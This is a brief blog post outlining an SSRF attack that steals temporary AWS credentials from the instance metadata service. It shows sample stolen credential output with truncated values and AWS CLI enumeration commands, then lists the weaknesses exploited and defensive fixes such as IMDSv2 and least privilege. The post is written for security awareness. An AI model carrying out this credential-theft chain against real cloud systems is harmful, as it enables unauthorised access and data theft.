Stealing AWS Credentials via SSRF in Metadata API
- Trung Le
- Jul 26
- 1 min read
🔴 Attacker discovers a web app vulnerable to Server-Side Request Forgery (SSRF) on a cloud-based server.
Exploit Payload
Phase 2 – Privilege Escalation
🔴 Extracts temporary AWS credentials.
Stolen Output.
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "xYi...",
"Token": "Fwo...",
"Expiration": "2025-07-30T12:34:56Z"
}
Phase 3 – Exploitation
🔴 Uses AWS CLI to enumerate S3 buckets, EC2 keys.
aws s3 ls
aws ec2 describe-instances --region us-east-1
Weaknesses Exploited
🔴 No SSRF protection
🔴 Open access to metadata service
🔴 Over-permissive IAM role
Defensive Recommendations
🔴 Enforce SSRF protection using allow-lists or proxies
🔴 Upgrade to IMDSv2 for EC2
🔴 Apply least privilege to IAM roles
🔴 Monitor API activity using CloudTrail
Comments